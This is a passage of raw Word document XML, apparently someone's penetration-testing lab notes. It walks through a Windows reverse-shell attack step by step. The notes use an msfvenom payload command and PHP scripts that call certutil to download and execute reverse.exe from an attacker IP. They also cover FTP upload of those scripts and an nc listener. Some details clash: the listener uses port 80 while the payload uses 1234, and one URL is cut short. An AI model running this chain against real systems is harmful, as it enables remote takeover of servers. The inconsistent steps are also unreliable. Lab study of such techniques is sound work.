        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F0">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the above doesn't work, you can try an alternative method for uploading and triggering a reverse shell. This involves uploading a .exe reverse shell and then activating it by running a .php file. It is shown in this write up. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is specific for windows though, because it's a .exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Generate reverse shell executable</w:t>
      </w:r>
    </w:p>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rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">64-bit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.243 LPORT=1234 -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">32-bit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.243 LPORT=1234 -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/shell_reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">32-bit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/x64/shell_reverse_tcp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">64-bit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, it is important to note that sometimes 32-bit stuff can run on 64-bit architecture! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You are using msfvenom to create a Windows executable (reverse.exe) that, when run, connects back (reverse shell) to your Kali machine (192.168.49.243) on port 1234.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload: windows/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output format: exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Prepare PHP scripts to deliver &amp; execute the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You create two PHP scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001400">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001401">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001402">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$download = system('certutil.exe -urlcache -split -f http://192.168.49.243/reverse.exe reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001403">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1404">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This uses Windows built-in certutil.exe to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001405">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-urlcache -split -f: download a file from a remote URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Downloads your reverse shell executable (reverse.exe) from your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001407">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Saves it as reverse.exe on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001408">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So this script pulls the malware onto the victim machine.</w:t>
      </w:r>
    </w:p>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes reverse.exe on the victim machine, triggering the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000140F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001410">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId384">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MedJed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we saw another run.php file</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001411">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001412">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$exec = system('C:/Users/Jerren/Desktop/reverse.exe', $val)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001414">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$val </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is an optional second parameter to system().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001415">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It captures the exit status code of the executed command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001416">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="989"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this script, $val will contain 0 if the command succeeded, or a non-zero value if it failed.</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Upload scripts onto FTP server</w:t>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t xml:space="preserve">You use FTP to upload upload.php and run.php to the folder that's:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000141C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Writable via FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000141D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Accessible via web server (HTTP)</w:t>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t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001420">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; put upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001421">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; put run.php</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Trigger the scripts via web server</w:t>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t xml:space="preserve">Visit in browser:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001426">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/upload.ph</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This runs certutil.exe on the server, which pulls down your reverse.exe from your Kali machine.</w:t>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t xml:space="preserve">Open listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="504"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 80</w:t>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t xml:space="preserve">Next, visit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000142E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
